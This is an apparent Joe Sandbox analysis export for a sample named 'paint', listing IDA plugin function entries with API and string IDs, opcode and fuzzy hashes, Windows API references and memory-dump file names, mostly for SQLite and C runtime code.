                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                                • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                                • Instruction ID: 58477a0e701500fbf40e235bc99630d023dc2420efa3178a9134585124fcbe38
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D21A176A19782A2E720DB50B8417E6A3A4EF89384F800131EE9E93799EF3DD5458700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                                • Instruction ID: 1232f706875bfb8d41ec79013348bb84748a80c6e052c3eb01c13e84141742bb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23F04F65A19606A1EB108B64A455B7A5324AF46762F940235DA7FC73E4EF2ED048C300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                • Instruction ID: 5f7e2e24d6ede3e7840de582d882e6ba251ff8385d6931e8aab55e526dbae262
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0211BF7AE0CA1321F77411A8E456375204C6F7B362F840634EE7FC77DEAE2EA8424100
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB41F
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB43E
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB466
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB477
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB488
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                • Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                                                                • Instruction ID: 5098c67132a8d9191e1c72c378cffcd9c9f5a47eebdc4a4831a1dcb0feceec16
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F114F60B0C643A2FB589725555157A61665F867B0F848374E93FC67D7FE3EB4018301
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                • Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                                                                • Instruction ID: d1fdb636a646d318e2a35fc9ebbffe2a19788d3f82a7c43097d109001c88b5c2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6111560E0C207A2FFA86621445267E22924F47331F9897B4D93FCA3C3FD3EB4018241
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,00000003,00000000,00007FFDFB0EA007,?,00000007,?), ref: 00007FFDFB0E9997
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2903559916
                                                                                                                                                                                                                                                                • Opcode ID: de542e699cf8672dba119d4255c91745efac7170ddd7288360a155c55f50754c
                                                                                                                                                                                                                                                                • Instruction ID: 5847e663ec4b9178cb8e39190492a40c0065320bf1a875949bf7f3c124f3d10c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de542e699cf8672dba119d4255c91745efac7170ddd7288360a155c55f50754c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAB1CC22B0B68385EB258B15D560BBA67A1AF82BD4F494135DE6D077F9DF3CE801E340
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                • Instruction ID: c55df2e6c0694ca746d1b9d050d2184e989314500516ef87d857b70608070f5a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6291CE32A08A46A1F7668E24D45037D33A1AB42BD4FC44276DA6F873D6FF3EE8058301
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB0F8AEF), ref: 00007FFDFB0F87B9
                                                                                                                                                                                                                                                                • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB0F8AEF), ref: 00007FFDFB0F883B
                                                                                                                                                                                                                                                                • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFDFB0F8AEF), ref: 00007FFDFB0F892D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2313493979
                                                                                                                                                                                                                                                                • Opcode ID: de7df61d44113aac0f43340fdba581afba9acef06b86af9c148db057996b514c
                                                                                                                                                                                                                                                                • Instruction ID: f7ca29ccc4ec22a40a81ed36af1ea1a11f114e3cf5c16357c94f99f45b677881
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de7df61d44113aac0f43340fdba581afba9acef06b86af9c148db057996b514c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57B17F22B0ABC285EB10CF159450AA96BA1FB56BA4F098335DA7D077E9DF38E1559300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB0A78D7), ref: 00007FFDFB0AD5BA
                                                                                                                                                                                                                                                                • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB0A78D7), ref: 00007FFDFB0AD5E4
                                                                                                                                                                                                                                                                • 00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFB0A78D7), ref: 00007FFDFB0AD637
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                                                • API String ID: 4225454184-2852464175
                                                                                                                                                                                                                                                                • Opcode ID: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
                                                                                                                                                                                                                                                                • Instruction ID: abaafd8788b900623d3e2c26d863d861c9761cacc704a2c34dac7756361c2e46
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1291B566B1A64286EB248E25D450B7977A8FB46F94F144B34DE7D0B7E8CF3CE450AB00
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                                • Instruction ID: 56de44e8f1467f795415ae8338c1b721cc165b2d436b73675951195d09786025
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73818F72F08243A5FB644E2585102782AA0EB13B49FE580B5DA2BD73D6FF2FB9019341
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                                                • API String ID: 0-1505470444
                                                                                                                                                                                                                                                                • Opcode ID: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
                                                                                                                                                                                                                                                                • Instruction ID: d0de9d4ce39a7e84df84abcb4e442a132cdc24553f5ac11bb47509a1c9a623ab
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81919A72B0AB8285EB20CB15E464BA967A4FB46BE4F454336DABC077E8DF39D041D700
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                • API String ID: 0-3727861699
                                                                                                                                                                                                                                                                • Opcode ID: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
                                                                                                                                                                                                                                                                • Instruction ID: e20ef2ec87dfdbb571ca5b793f889e6cedf107206a0e9a24fb3bef14bd97cd8d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be111bc764e9eb46fb0fceec14cef625345d2311889ec31baec9b19fb1852189
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF81F662B0AAC38AD7208B25C5A0E7E77A0FB41784F048132DBAD436E9DF3CE555D700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: 00007A463010
                                                                                                                                                                                                                                                                • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                                                                • API String ID: 4225454184-3459038510
                                                                                                                                                                                                                                                                • Opcode ID: f5dab35276e823905d8a8efc2fbf2e609b3d139e1c4d1f6f4a3d61b1e56e9fbb
                                                                                                                                                                                                                                                                • Instruction ID: e4ddc4d2088ed6a600a96627194aedbf623c2927f340ddf47d0316ac2453e6cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5dab35276e823905d8a8efc2fbf2e609b3d139e1c4d1f6f4a3d61b1e56e9fbb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F46139A3B0A58346D7118F24A450AB9B7A2FB45BA8F444335DE7D432E9DF3CD446C300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.2013426793.00007FFDFAA01000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAA00000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013391762.00007FFDFAA00000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAA62000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAAE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAB2000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAAB7000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB14000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013426793.00007FFDFAB17000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013772305.00007FFDFAB18000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.2013801898.00007FFDFAB19000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
